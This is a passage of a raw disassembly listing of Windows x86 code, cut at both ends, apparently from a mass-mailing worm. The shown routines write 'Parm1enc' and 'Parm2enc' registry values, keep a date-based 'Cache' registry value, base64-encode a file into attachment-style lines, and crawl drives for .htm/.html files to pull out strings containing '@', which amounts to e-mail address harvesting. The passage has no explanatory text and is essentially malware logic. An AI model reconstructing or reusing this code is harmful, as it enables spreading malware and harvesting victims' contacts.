3617504B jnz loc_36175251 36175051 push esi 36175052 push esi 36175053 push esi 36175054 lea eax, [ebp+var_10] 36175057 push esi 36175058 mov edi, ds:RegEnumKeyExA 3617505E push eax 3617505F lea eax, [ebp+var_15C] 36175065 push eax 36175066 push esi 36175067 push [ebp+var_1C] 3617506A mov [ebp+var_10], 0FFh 36175071 mov [ebp+var_8], esi 36175074 call edi ; RegEnumKeyExA 36175076 mov ebx, ds:RegSetValueExA 3617507C test eax, eax 3617507E jnz loc_36175171 36175084 36175084 loc_36175084: ; CODE XREF: sub_36174F1E+24Dj 36175084 cmp [ebp+var_15B], 24h 3617508B jz loc_36175148 36175091 lea eax, [ebp+var_260] 36175097 push offset aSoftwareMicr_6 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... 3617509C push eax 3617509D call _strcpy 361750A2 lea eax, [ebp+var_15C] 361750A8 push eax 361750A9 lea eax, [ebp+var_260] 361750AF push eax 361750B0 call _strcat 361750B5 add esp, 10h 361750B8 lea eax, [ebp+var_4] 361750BB push eax 361750BC push 0F003Fh 361750C1 lea eax, [ebp+var_260] 361750C7 push esi 361750C8 push eax 361750C9 push 80000002h 361750CE call ds:RegOpenKeyExA 361750D4 test eax, eax 361750D6 jnz short loc_36175148 361750D8 lea eax, [ebp+var_18] 361750DB mov [ebp+var_18], 400h 361750E2 push eax 361750E3 lea eax, [ebp+var_75C] 361750E9 push eax 361750EA push esi 361750EB push esi 361750EC push offset aPath ; "Path" 361750F1 push [ebp+var_4] 361750F4 mov [ebp+var_C], 192h 361750FB call ds:RegQueryValueExA 36175101 lea eax, [ebp+var_C] 36175104 push 4 36175106 push eax 36175107 push 4 36175109 push esi 3617510A push offset aFlags ; "Flags" 3617510F push [ebp+var_4] 36175112 call ebx ; RegSetValueExA 36175114 push esi 36175115 push esi 36175116 push 3 36175118 push esi 36175119 push offset aParm1enc ; "Parm1enc" 3617511E push [ebp+var_4] 36175121 call ebx ; RegSetValueExA 36175123 push esi 36175124 push esi 36175125 push 3 36175127 push esi 36175128 push offset aParm2enc ; "Parm2enc" 3617512D push [ebp+var_4] 36175130 call ebx ; RegSetValueExA 36175132 lea eax, [ebp+var_75C] 36175138 push eax 36175139 call sub_36173DCF 3617513E pop ecx 3617513F push [ebp+var_4] 36175142 call ds:RegCloseKey 36175148 36175148 loc_36175148: ; CODE XREF: sub_36174F1E+16Dj 36175148 ; sub_36174F1E+1B8j 36175148 inc [ebp+var_8] 3617514B push esi 3617514C push esi 3617514D push esi 3617514E lea eax, [ebp+var_10] 36175151 push esi 36175152 push eax 36175153 lea eax, [ebp+var_15C] 36175159 push eax 3617515A mov [ebp+var_10], 0FFh 36175161 push [ebp+var_8] 36175164 push [ebp+var_1C] 36175167 call edi ; RegEnumKeyExA 36175169 test eax, eax 3617516B jz loc_36175084 36175171 36175171 loc_36175171: ; CODE XREF: sub_36174F1E+160j 36175171 mov [ebp+var_C], esi 36175174 36175174 loc_36175174: ; CODE XREF: sub_36174F1E+324j 36175174 mov al, byte ptr [ebp+var_C] 36175177 push 0Fh 36175179 pop ecx 3617517A mov esi, offset aSoftwareMicr_7 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... 3617517F lea edi, [ebp+var_5C] 36175182 add al, 43h 36175184 repe movsd 36175186 mov [ebp+var_11], al 36175189 mov [ebp+var_23], al 3617518C lea eax, [ebp+var_20] 3617518F xor esi, esi 36175191 push eax 36175192 lea eax, [ebp+var_4] 36175195 push eax 36175196 push esi 36175197 push 0F003Fh 3617519C push esi 3617519D push esi 3617519E lea eax, [ebp+var_5C] 361751A1 push esi 361751A2 push eax 361751A3 push 80000002h 361751A8 call ds:RegCreateKeyExA 361751AE test eax, eax 361751B0 jnz loc_3617523B 361751B6 mov eax, dword_3617A194 361751BB push 4 361751BD mov [ebp+var_18], eax 361751C0 mov al, [ebp+var_11] 361751C3 mov byte ptr [ebp+var_18], al 361751C6 pop edi 361751C7 lea eax, [ebp+var_8] 361751CA push edi 361751CB push eax 361751CC push edi 361751CD push esi 361751CE push offset aFlags ; "Flags" 361751D3 push [ebp+var_4] 361751D6 mov [ebp+var_8], 192h 361751DD call ebx ; RegSetValueExA 361751DF push esi 361751E0 push esi 361751E1 push 3 361751E3 push esi 361751E4 push offset aParm1enc ; "Parm1enc" 361751E9 push [ebp+var_4] 361751EC call ebx ; RegSetValueExA 361751EE push esi 361751EF push esi 361751F0 push 3 361751F2 push esi 361751F3 push offset aParm2enc ; "Parm2enc" 361751F8 push [ebp+var_4] 361751FB call ebx ; RegSetValueExA 361751FD lea eax, [ebp+var_18] 36175200 push edi 36175201 push eax 36175202 push 1 36175204 push esi 36175205 push offset aPath ; "Path" 3617520A push [ebp+var_4] 3617520D call ebx ; RegSetValueExA 3617520F push esi 36175210 push esi 36175211 push 1 36175213 push esi 36175214 push offset aRemark ; "Remark" 36175219 push [ebp+var_4] 3617521C call ebx ; RegSetValueExA 3617521E lea eax, [ebp+var_8] 36175221 push edi 36175222 push eax 36175223 push edi 36175224 push esi 36175225 push offset aType ; "Type" 3617522A push [ebp+var_4] 3617522D mov [ebp+var_8], esi 36175230 call ebx ; RegSetValueExA 36175232 push [ebp+var_4] 36175235 call ds:RegCloseKey 3617523B 3617523B loc_3617523B: ; CODE XREF: sub_36174F1E+292j 3617523B inc [ebp+var_C] 3617523E cmp [ebp+var_C], 18h 36175242 jb loc_36175174 36175248 push [ebp+var_1C] 3617524B 3617524B loc_3617524B: ; CODE XREF: sub_36174F1E+102j 3617524B call ds:RegCloseKey 36175251 36175251 loc_36175251: ; CODE XREF: sub_36174F1E+44j 36175251 ; sub_36174F1E+12Dj 36175251 pop edi 36175252 pop esi 36175253 pop ebx 36175254 leave 36175255 retn 36175255 sub_36174F1E endp 36175255 36175256 36175256 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36175256 36175256 ; Attributes: bp-based frame 36175256 36175256 sub_36175256 proc near ; CODE XREF: sub_361767C9+F8p 36175256 36175256 var_1C = byte ptr -1Ch 36175256 var_1B = dword ptr -1Bh 36175256 var_14 = byte ptr -14h 36175256 var_10 = dword ptr -10h 36175256 var_C = dword ptr -0Ch 36175256 var_8 = dword ptr -8 36175256 var_4 = dword ptr -4 36175256 arg_0 = dword ptr 8 36175256 arg_4 = dword ptr 0Ch 36175256 36175256 push ebp 36175257 mov ebp, esp 36175259 sub esp, 1Ch 3617525C push ebx 3617525D push esi 3617525E xor ebx, ebx 36175260 push edi 36175261 push ebx 36175262 mov esi, ds:CreateFileA 36175268 push ebx 36175269 push 3 3617526B push ebx 3617526C push 1 3617526E push 80000000h 36175273 mov [ebp+var_C], ebx 36175276 push [ebp+arg_0] 36175279 call esi ; CreateFileA 3617527B mov edi, eax 3617527D cmp edi, 0FFFFFFFFh 36175280 jz loc_3617531C 36175286 push ebx 36175287 push edi 36175288 call ds:GetFileSize 3617528E cmp eax, 0FFFFFFFFh 36175291 mov [ebp+var_8], eax 36175294 jnz short loc_3617529F 36175296 36175296 loc_36175296: ; CODE XREF: sub_36175256+60j 36175296 push edi 36175297 call ds:CloseHandle 3617529D jmp short loc_3617531C 3617529F ; ─────────────────────────────────────────────────────────────────────────── 3617529F 3617529F loc_3617529F: ; CODE XREF: sub_36175256+3Ej 3617529F add eax, 10h 361752A2 push eax 361752A3 push 8 361752A5 push dword_3617ACB4 361752AB call dword_3617AC74 361752B1 cmp eax, ebx 361752B3 mov [ebp+var_4], eax 361752B6 jz short loc_36175296 361752B8 lea ecx, [ebp+var_C] 361752BB push ebx 361752BC push ecx 361752BD push [ebp+var_8] 361752C0 push eax 361752C1 push edi 361752C2 call ds:ReadFile 361752C8 test eax, eax 361752CA push edi 361752CB jnz short loc_361752D5 361752CD call ds:CloseHandle 361752D3 jmp short loc_3617530C 361752D5 ; ─────────────────────────────────────────────────────────────────────────── 361752D5 361752D5 loc_361752D5: ; CODE XREF: sub_36175256+75j 361752D5 call ds:CloseHandle 361752DB mov eax, [ebp+var_8] 361752DE push 3 361752E0 xor edx, edx 361752E2 pop ecx 361752E3 div ecx 361752E5 cmp edx, ebx 361752E7 mov [ebp+arg_0], edx 361752EA jz short loc_361752F3 361752EC push ecx 361752ED pop eax 361752EE sub eax, edx 361752F0 mov [ebp+arg_0], eax 361752F3 361752F3 loc_361752F3: ; CODE XREF: sub_36175256+94j 361752F3 push ebx 361752F4 push ebx 361752F5 push 4 361752F7 push ebx 361752F8 push 1 361752FA push 40000000h 361752FF push [ebp+arg_4] 36175302 call esi ; CreateFileA 36175304 cmp eax, 0FFFFFFFFh 36175307 mov [ebp+arg_4], eax 3617530A jnz short loc_36175323 3617530C 3617530C loc_3617530C: ; CODE XREF: sub_36175256+7Dj 3617530C push [ebp+var_4] 3617530F push ebx 36175310 push dword_3617ACB4 36175316 call dword_3617AC70 3617531C 3617531C loc_3617531C: ; CODE XREF: sub_36175256+2Aj 3617531C ; sub_36175256+47j 3617531C xor eax, eax 3617531E jmp loc_36175456 36175323 ; ─────────────────────────────────────────────────────────────────────────── 36175323 36175323 loc_36175323: ; CODE XREF: sub_36175256+B4j 36175323 push 2 36175325 push ebx 36175326 push ebx 36175327 push eax 36175328 call ds:SetFilePointer 3617532E mov eax, [ebp+var_8] 36175331 xor edi, edi 36175333 xor ecx, ecx 36175335 cmp [ebp+arg_0], ebx 36175338 push 3 3617533A setnz cl 3617533D xor edx, edx 3617533F pop esi 36175340 div esi 36175342 add eax, ecx 36175344 cmp eax, ebx 36175346 mov [ebp+var_8], eax 36175349 jbe loc_3617543A 3617534F mov esi, [ebp+var_4] 36175352 jmp short loc_36175357 36175354 ; ─────────────────────────────────────────────────────────────────────────── 36175354 36175354 loc_36175354: ; CODE XREF: sub_36175256+1DEj 36175354 mov eax, [ebp+var_8] 36175357 36175357 loc_36175357: ; CODE XREF: sub_36175256+FCj 36175357 dec eax 36175358 cmp edi, eax 3617535A mov [ebp+var_10], eax 3617535D jnz short loc_36175374 3617535F cmp [ebp+arg_0], ebx 36175362 jz short loc_36175374 36175364 cmp [ebp+arg_0], 1 36175368 jnz short loc_3617536E 3617536A xor dl, dl 3617536C jmp short loc_36175377 3617536E ; ─────────────────────────────────────────────────────────────────────────── 3617536E 3617536E loc_3617536E: ; CODE XREF: sub_36175256+112j 3617536E xor dl, dl 36175370 xor cl, cl 36175372 jmp short loc_3617537A 36175374 ; ─────────────────────────────────────────────────────────────────────────── 36175374 36175374 loc_36175374: ; CODE XREF: sub_36175256+107j 36175374 ; sub_36175256+10Cj 36175374 mov dl, [esi+2] 36175377 36175377 loc_36175377: ; CODE XREF: sub_36175256+116j 36175377 mov cl, [esi+1] 3617537A 3617537A loc_3617537A: ; CODE XREF: sub_36175256+11Cj 3617537A mov bl, dl 3617537C mov al, [esi] 3617537E and bl, 3Fh 36175381 mov byte ptr [ebp+var_1B+2], bl 36175384 mov bl, cl 36175386 and bl, 0Fh 36175389 shl bl, 2 3617538C shr dl, 6 3617538F or bl, dl 36175391 mov dl, al 36175393 and dl, 3 36175396 mov byte ptr [ebp+var_1B+1], bl 36175399 shl dl, 4 3617539C shr cl, 4 3617539F or dl, cl 361753A1 shr al, 2 361753A4 mov byte ptr [ebp+var_1B], dl 361753A7 mov [ebp+var_1C], al 361753AA push dword ptr [ebp+var_1C] 361753AD call sub_3617545B 361753B2 push [ebp+var_1B] 361753B5 mov [ebp+var_1C], al 361753B8 call sub_3617545B 361753BD push [ebp+var_1B+1] 361753C0 mov byte ptr [ebp+var_1B], al 361753C3 call sub_3617545B 361753C8 push [ebp+var_1B+2] 361753CB mov byte ptr [ebp+var_1B+1], al 361753CE call sub_3617545B 361753D3 add esp, 10h 361753D6 cmp edi, [ebp+var_10] 361753D9 mov byte ptr [ebp+var_1B+2], al 361753DC jnz short loc_361753F5 361753DE xor ebx, ebx 361753E0 cmp [ebp+arg_0], ebx 361753E3 jz short loc_361753F7 361753E5 cmp [ebp+arg_0], 1 361753E9 jz short loc_361753EF 361753EB mov byte ptr [ebp+var_1B+1], 3Dh 361753EF 361753EF loc_361753EF: ; CODE XREF: sub_36175256+193j 361753EF mov byte ptr [ebp+var_1B+2], 3Dh 361753F3 jmp short loc_361753F7 361753F5 ; ─────────────────────────────────────────────────────────────────────────── 361753F5 361753F5 loc_361753F5: ; CODE XREF: sub_36175256+186j 361753F5 xor ebx, ebx 361753F7 361753F7 loc_361753F7: ; CODE XREF: sub_36175256+18Dj 361753F7 ; sub_36175256+19Dj 361753F7 lea eax, [ebp+var_14] 361753FA push ebx 361753FB push eax 361753FC lea eax, [ebp+var_1C] 361753FF push 4 36175401 push eax 36175402 push [ebp+arg_4] 36175405 call ds:WriteFile 3617540B inc edi 3617540C push 13h 3617540E mov eax, edi 36175410 xor edx, edx 36175412 pop ecx 36175413 div ecx 36175415 test edx, edx 36175417 jnz short loc_3617542E 36175419 lea eax, [ebp+var_14] 3617541C push ebx 3617541D push eax 3617541E push 2 36175420 push offset asc_3617A2AC ; "\r\n" 36175425 push [ebp+arg_4] 36175428 call ds:WriteFile 3617542E 3617542E loc_3617542E: ; CODE XREF: sub_36175256+1C1j 3617542E add esi, 3 36175431 cmp edi, [ebp+var_8] 36175434 jb loc_36175354 3617543A 3617543A loc_3617543A: ; CODE XREF: sub_36175256+F3j 3617543A push [ebp+var_4] 3617543D push ebx 3617543E push dword_3617ACB4 36175444 call dword_3617AC70 3617544A push [ebp+arg_4] 3617544D call ds:CloseHandle 36175453 push 1 36175455 pop eax 36175456 36175456 loc_36175456: ; CODE XREF: sub_36175256+C8j 36175456 pop edi 36175457 pop esi 36175458 pop ebx 36175459 leave 3617545A retn 3617545A sub_36175256 endp 3617545A 3617545B 3617545B ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617545B 3617545B 3617545B sub_3617545B proc near ; CODE XREF: sub_36175256+157p 3617545B ; sub_36175256+162p ... 3617545B 3617545B arg_0 = byte ptr 4 3617545B 3617545B mov al, [esp+arg_0] 3617545F cmp al, 19h 36175461 ja short loc_36175466 36175463 add al, 41h 36175465 retn 36175466 ; ─────────────────────────────────────────────────────────────────────────── 36175466 36175466 loc_36175466: ; CODE XREF: sub_3617545B+6j 36175466 cmp al, 1Ah 36175468 jb short loc_36175471 3617546A cmp al, 33h 3617546C ja short loc_36175471 3617546E add al, 47h 36175470 retn 36175471 ; ─────────────────────────────────────────────────────────────────────────── 36175471 36175471 loc_36175471: ; CODE XREF: sub_3617545B+Dj 36175471 ; sub_3617545B+11j 36175471 cmp al, 34h 36175473 jb short loc_3617547C 36175475 cmp al, 3Dh 36175477 ja short loc_3617547C 36175479 add al, 0FCh 3617547B retn 3617547C ; ─────────────────────────────────────────────────────────────────────────── 3617547C 3617547C loc_3617547C: ; CODE XREF: sub_3617545B+18j 3617547C ; sub_3617545B+1Cj 3617547C cmp al, 3Eh 3617547E jnz short loc_36175483 36175480 add al, 0EDh 36175482 retn 36175483 ; ─────────────────────────────────────────────────────────────────────────── 36175483 36175483 loc_36175483: ; CODE XREF: sub_3617545B+23j 36175483 cmp al, 3Fh 36175485 setnz al 36175488 dec eax 36175489 and eax, 2Fh 3617548C retn 3617548C sub_3617545B endp 3617548C 3617548D 3617548D ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617548D 3617548D ; Attributes: bp-based frame 3617548D 3617548D sub_3617548D proc near ; CODE XREF: sub_36171F05+136p 3617548D 3617548D var_28 = word ptr -28h 3617548D var_26 = word ptr -26h 3617548D var_22 = word ptr -22h 3617548D var_18 = dword ptr -18h 3617548D var_14 = dword ptr -14h 3617548D var_10 = dword ptr -10h 3617548D var_C = dword ptr -0Ch 3617548D var_8 = dword ptr -8 3617548D var_4 = dword ptr -4 3617548D 3617548D push ebp 3617548E mov ebp, esp 36175490 sub esp, 28h 36175493 push ebx 36175494 lea eax, [ebp+var_28] 36175497 push edi 36175498 xor ebx, ebx 3617549A push eax 3617549B mov [ebp+var_10], ebx 3617549E call ds:GetSystemTime 361754A4 movzx eax, [ebp+var_28] 361754A8 movzx ecx, [ebp+var_26] 361754AC imul eax, 16Dh 361754B2 imul ecx, 1Eh 361754B5 add eax, ecx 361754B7 push 4 361754B9 movzx ecx, [ebp+var_22] 361754BD add eax, ecx 361754BF pop edi 361754C0 mov [ebp+var_C], eax 361754C3 lea eax, [ebp+var_14] 361754C6 push eax 361754C7 lea eax, [ebp+var_4] 361754CA push eax 361754CB push ebx 361754CC push 0F003Fh 361754D1 push ebx 361754D2 push ebx 361754D3 push ebx 361754D4 push offset aSoftwareMicr_8 ; "Software\\Microsoft\\Windows\\CurrentVersi"... 361754D9 push 80000001h 361754DE mov [ebp+var_8], edi 361754E1 call ds:RegCreateKeyExA 361754E7 test eax, eax 361754E9 jnz loc_36175574 361754EF cmp [ebp+var_14], 2 361754F3 push esi 361754F4 jnz short loc_36175548 361754F6 lea eax, [ebp+var_8] 361754F9 mov esi, offset aCache ; "Cache" 361754FE push eax 361754FF lea eax, [ebp+var_18] 36175502 push eax 36175503 push ebx 36175504 push ebx 36175505 push esi 36175506 push [ebp+var_4] 36175509 call ds:RegQueryValueExA 3617550F test eax, eax 36175511 jnz short loc_36175533 36175513 mov eax, [ebp+var_18] 36175516 add eax, 0Ah 36175519 cmp eax, [ebp+var_C] 3617551C jnb short loc_3617556A 3617551E push [ebp+var_8] 36175521 lea eax, [ebp+var_C] 36175524 push eax 36175525 push edi 36175526 push ebx 36175527 push esi 36175528 push [ebp+var_4] 3617552B call ds:RegSetValueExA 36175531 jmp short loc_36175563 36175533 ; ─────────────────────────────────────────────────────────────────────────── 36175533 36175533 loc_36175533: ; CODE XREF: sub_3617548D+84j 36175533 push [ebp+var_8] 36175536 lea eax, [ebp+var_C] 36175539 push eax 3617553A push edi 3617553B push ebx 3617553C push esi 3617553D push [ebp+var_4] 36175540 call ds:RegSetValueExA 36175546 jmp short loc_3617556A 36175548 ; ─────────────────────────────────────────────────────────────────────────── 36175548 36175548 loc_36175548: ; CODE XREF: sub_3617548D+67j 36175548 push [ebp+var_8] 3617554B lea eax, [ebp+var_C] 3617554E push eax 3617554F push edi 36175550 push ebx 36175551 push offset aCache ; "Cache" 36175556 push [ebp+var_4] 36175559 call ds:RegSetValueExA 3617555F test eax, eax 36175561 jnz short loc_3617556A 36175563 36175563 loc_36175563: ; CODE XREF: sub_3617548D+A4j 36175563 mov [ebp+var_10], 1 3617556A 3617556A loc_3617556A: ; CODE XREF: sub_3617548D+8Fj 3617556A ; sub_3617548D+B9j ... 3617556A push [ebp+var_4] 3617556D call ds:RegCloseKey 36175573 pop esi 36175574 36175574 loc_36175574: ; CODE XREF: sub_3617548D+5Cj 36175574 cmp [ebp+var_10], ebx 36175577 mov byte_3617D664, bl 3617557D pop edi 3617557E pop ebx 3617557F jz short loc_36175586 36175581 call sub_3617558B 36175586 36175586 loc_36175586: ; CODE XREF: sub_3617548D+F2j 36175586 push 1 36175588 pop eax 36175589 leave 3617558A retn 3617558A sub_3617548D endp 3617558A 3617558B 3617558B ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617558B 3617558B ; Attributes: bp-based frame 3617558B 3617558B sub_3617558B proc near ; CODE XREF: sub_3617548D+F4p 3617558B 3617558B var_408 = byte ptr -408h 3617558B var_8 = dword ptr -8 3617558B var_4 = dword ptr -4 3617558B 3617558B push ebp 3617558C mov ebp, esp 3617558E sub esp, 408h 36175594 lea eax, [ebp+var_4] 36175597 mov [ebp+var_8], 400h 3617559E push eax 3617559F push 0F003Fh 361755A4 push 0 361755A6 push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"... 361755AB push 80000001h 361755B0 call ds:RegOpenKeyExA 361755B6 test eax, eax 361755B8 jnz short loc_361755ED 361755BA lea eax, [ebp+var_8] 361755BD push eax 361755BE lea eax, [ebp+var_408] 361755C4 push eax 361755C5 push 0 361755C7 push 0 361755C9 push offset aCache ; "Cache" 361755CE push [ebp+var_4] 361755D1 call ds:RegQueryValueExA 361755D7 push [ebp+var_4] 361755DA call ds:RegCloseKey 361755E0 lea eax, [ebp+var_408] 361755E6 push eax 361755E7 call sub_361755FC 361755EC pop ecx 361755ED 361755ED loc_361755ED: ; CODE XREF: sub_3617558B+2Dj 361755ED call sub_36175FA5 361755F2 call sub_361759E8 361755F7 push 1 361755F9 pop eax 361755FA leave 361755FB retn 361755FB sub_3617558B endp 361755FB 361755FC 361755FC ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 361755FC 361755FC 361755FC sub_361755FC proc near ; CODE XREF: sub_3617558B+5Cp 361755FC ; sub_361755FC+F5p 361755FC 361755FC var_164 = dword ptr -164h 361755FC var_150 = dword ptr -150h 361755FC var_14C = byte ptr -14Ch 361755FC var_124 = byte ptr -124h 361755FC var_120 = byte ptr -120h 361755FC var_8 = dword ptr -8 361755FC 361755FC sub esp, 144h 36175602 push esi 36175603 push edi 36175604 mov edi, 400h 36175609 push edi 3617560A push 8 3617560C push dword_3617ACB4 36175612 call dword_3617AC74 36175618 mov esi, eax 3617561A test esi, esi 3617561C jz loc_361757BC 36175622 push ebx 36175623 push ebp 36175624 mov ebp, ds:strncpy 3617562A push edi 3617562B push [esp+164h+var_8] 36175632 push esi 36175633 call ebp ; strncpy 36175635 push esi 36175636 call sub_3617186E 3617563B push [esp+170h+var_8] 36175642 call _strlen 36175647 mov ebx, ds:strncat 3617564D mov ecx, edi 3617564F sub ecx, eax 36175651 push ecx 36175652 push offset a_ ; "\\*.*" 36175657 push esi 36175658 call ebx ; strncat 3617565A add esp, 20h 3617565D lea eax, [esp+160h+var_14C] 36175661 push eax 36175662 push esi 36175663 call ds:FindFirstFileA 36175669 cmp eax, 0FFFFFFFFh 3617566C mov [esp+160h+var_150], eax 36175670 jnz short loc_36175679 36175672 xor edi, edi 36175674 jmp loc_361757A9 36175679 ; ─────────────────────────────────────────────────────────────────────────── 36175679 36175679 loc_36175679: ; CODE XREF: sub_361755FC+74j 36175679 ; sub_361755FC+19Aj 36175679 lea eax, [esp+160h+var_120] 3617567D push eax 3617567E call ds:_strlwr 36175684 lea eax, [esp+164h+var_120] 36175688 mov [esp+164h+var_164], offset dot ; "." 3617568F push eax 36175690 call _strcmp 36175695 pop ecx 36175696 test eax, eax 36175698 pop ecx 36175699 jz loc_36175785 3617569F lea eax, [esp+160h+var_120] 361756A3 push offset a__ ; ".." 361756A8 push eax 361756A9 call _strcmp 361756AE pop ecx 361756AF test eax, eax 361756B1 pop ecx 361756B2 jz loc_36175785 361756B8 test [esp+160h+var_14C], 10h 361756BD jz short loc_361756FB 361756BF push edi 361756C0 push [esp+164h+var_8] 361756C7 push esi 361756C8 call ebp ; strncpy 361756CA push esi 361756CB call _strlen 361756D0 mov ecx, edi 361756D2 sub ecx, eax 361756D4 push ecx 361756D5 push offset asc_36179474 ; "\\" 361756DA push esi 361756DB call ebx ; strncat 361756DD push esi 361756DE call _strlen 361756E3 mov ecx, edi 361756E5 sub ecx, eax 361756E7 lea eax, [esp+180h+var_120] 361756EB push ecx 361756EC push eax 361756ED push esi 361756EE call ebx ; strncat 361756F0 push esi 361756F1 call sub_361755FC 361756F6 jmp loc_36175782 361756FB ; ─────────────────────────────────────────────────────────────────────────── 361756FB 361756FB loc_361756FB: ; CODE XREF: sub_361755FC+C1j 361756FB lea eax, [esp+160h+var_120] 361756FF push eax 36175700 call _strlen 36175705 cmp eax, 4 36175708 pop ecx 36175709 jbe short loc_36175785 3617570B lea eax, [esp+160h+var_120] 3617570F push offset dot_htm ; ".htm" 36175714 push eax 36175715 call _strlen 3617571A pop ecx 3617571B lea eax, [esp+eax+164h+var_124] 3617571F push eax 36175720 call _strcmp 36175725 pop ecx 36175726 test eax, eax 36175728 pop ecx 36175729 jz short loc_3617574B 3617572B lea eax, [esp+160h+var_120] 3617572F push offset html_ext ; "html" 36175734 push eax 36175735 call _strlen 3617573A pop ecx 3617573B lea eax, [esp+eax+164h+var_124] 3617573F push eax 36175740 call _strcmp 36175745 pop ecx 36175746 test eax, eax 36175748 pop ecx 36175749 jnz short loc_36175785 3617574B 3617574B loc_3617574B: ; CODE XREF: sub_361755FC+12Dj 3617574B push edi 3617574C push [esp+164h+var_8] 36175753 push esi 36175754 call ebp ; strncpy 36175756 push esi 36175757 call _strlen 3617575C mov ecx, edi 3617575E sub ecx, eax 36175760 push ecx 36175761 push offset asc_36179474 ; "\\" 36175766 push esi 36175767 call ebx ; strncat 36175769 push esi 3617576A call _strlen 3617576F mov ecx, edi 36175771 sub ecx, eax 36175773 lea eax, [esp+180h+var_120] 36175777 push ecx 36175778 push eax 36175779 push esi 3617577A call ebx ; strncat 3617577C push esi 3617577D call sub_361757C5 36175782 36175782 loc_36175782: ; CODE XREF: sub_361755FC+FAj 36175782 add esp, 30h 36175785 36175785 loc_36175785: ; CODE XREF: sub_361755FC+9Dj 36175785 ; sub_361755FC+B6j ... 36175785 lea eax, [esp+160h+var_14C] 36175789 push eax 3617578A push [esp+164h+var_150] 3617578E call ds:FindNextFileA 36175794 test eax, eax 36175796 jnz loc_36175679 3617579C push [esp+160h+var_150] 361757A0 call ds:FindClose 361757A6 push 1 361757A8 pop edi 361757A9 361757A9 loc_361757A9: ; CODE XREF: sub_361755FC+78j 361757A9 push esi 361757AA push 0 361757AC push dword_3617ACB4 361757B2 call dword_3617AC70 361757B8 pop ebp 361757B9 mov eax, edi 361757BB pop ebx 361757BC 361757BC loc_361757BC: ; CODE XREF: sub_361755FC+20j 361757BC pop edi 361757BD pop esi 361757BE add esp, 144h 361757C4 retn 361757C4 sub_361755FC endp ; sp = -18h 361757C4 361757C5 361757C5 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 361757C5 361757C5 ; Attributes: bp-based frame 361757C5 361757C5 sub_361757C5 proc near ; CODE XREF: sub_361755FC+181p 361757C5 361757C5 var_108 = byte ptr -108h 361757C5 var_8 = dword ptr -8 361757C5 var_4 = dword ptr -4 361757C5 arg_0 = dword ptr 8 361757C5 361757C5 push ebp 361757C6 mov ebp, esp 361757C8 sub esp, 108h 361757CE push ebx 361757CF push esi 361757D0 xor ebx, ebx 361757D2 push edi 361757D3 push ebx 361757D4 push ebx 361757D5 push 3 361757D7 push ebx 361757D8 push 3 361757DA push 80000000h 361757DF push [ebp+arg_0] 361757E2 mov [ebp+var_8], ebx 361757E5 call ds:CreateFileA 361757EB mov esi, eax 361757ED cmp esi, 0FFFFFFFFh 361757F0 jz short loc_36175829 361757F2 push ebx 361757F3 push esi 361757F4 call ds:GetFileSize 361757FA mov edi, eax 361757FC cmp edi, 0FFFFFFFFh 361757FF mov [ebp+arg_0], edi 36175802 jz short loc_36175822 36175804 cmp edi, 800000h 3617580A ja short loc_36175822 3617580C push edi 3617580D push 8 3617580F push dword_3617ACB4 36175815 call dword_3617AC74 3617581B cmp eax, ebx 3617581D mov [ebp+var_4], eax 36175820 jnz short loc_36175830 36175822 36175822 loc_36175822: ; CODE XREF: sub_361757C5+3Dj 36175822 ; sub_361757C5+45j 36175822 push esi 36175823 call ds:CloseHandle 36175829 36175829 loc_36175829: ; CODE XREF: sub_361757C5+2Bj 36175829 xor eax, eax 3617582B jmp loc_36175914 36175830 ; ─────────────────────────────────────────────────────────────────────────── 36175830 36175830 loc_36175830: ; CODE XREF: sub_361757C5+5Bj 36175830 lea ecx, [ebp+var_8] 36175833 push ebx 36175834 push ecx 36175835 push edi 36175836 push eax 36175837 push esi 36175838 call ds:ReadFile 3617583E test eax, eax 36175840 push esi 36175841 jnz short loc_36175850 36175843 call ds:CloseHandle 36175849 xor esi, esi 3617584B jmp loc_36175902 36175850 ; ─────────────────────────────────────────────────────────────────────────── 36175850 36175850 loc_36175850: ; CODE XREF: sub_361757C5+7Cj 36175850 call ds:CloseHandle 36175856 xor ecx, ecx 36175858 xor esi, esi 3617585A xor edi, edi 3617585C cmp [ebp+arg_0], ebx 3617585F jbe loc_361758FF 36175865 36175865 loc_36175865: ; CODE XREF: sub_361757C5+134j 36175865 mov edx, [ebp+var_4] 36175868 mov al, [edi+edx] 3617586B cmp al, 7Bh 3617586D jge short loc_36175894 3617586F cmp al, 2Dh 36175871 jle short loc_36175894 36175873 cmp al, 2Fh 36175875 jz short loc_36175894 36175877 cmp al, 3Ah 36175879 jl short loc_3617587F 3617587B cmp al, 3Fh 3617587D jle short loc_36175894 3617587F 3617587F loc_3617587F: ; CODE XREF: sub_361757C5+B4j 3617587F cmp al, 5Bh 36175881 jl short loc_36175887 36175883 cmp al, 5Eh 36175885 jle short loc_36175894 36175887 36175887 loc_36175887: ; CODE XREF: sub_361757C5+BCj 36175887 cmp al, 60h 36175889 jz short loc_36175894 3617588B cmp al, 40h 3617588D jnz short loc_361758F5 3617588F push 1 36175891 pop esi 36175892 jmp short loc_361758F5 36175894 ; ─────────────────────────────────────────────────────────────────────────── 36175894 36175894 loc_36175894: ; CODE XREF: sub_361757C5+A8j 36175894 ; sub_361757C5+ACj ... 36175894 cmp esi, ebx 36175896 jz short loc_361758F1 36175898 cmp edi, ecx 3617589A jbe short loc_361758EB 3617589C mov esi, edi 3617589E sub esi, ecx 361758A0 cmp esi, 2 361758A3 jbe short loc_361758EB 361758A5 cmp esi, 80h 361758AB jnb short loc_361758EB 361758AD lea eax, [esi-1] 361758B0 push eax 361758B1 lea eax, [ecx+edx+1] 361758B5 push eax 361758B6 lea eax, [ebp+var_108] 361758BC push eax 361758BD call _memcpy 361758C2 lea eax, [ebp+esi+var_108] 361758C9 add esp, 0Ch 361758CC mov [eax-1], bl 361758CF cmp [ebp+var_108], 40h 361758D6 jz short loc_361758EB 361758D8 cmp byte ptr [eax-2], 40h 361758DC jz short loc_361758EB 361758DE lea eax, [ebp+var_108] 361758E4 push eax 361758E5 call sub_36175919 361758EA pop ecx 361758EB 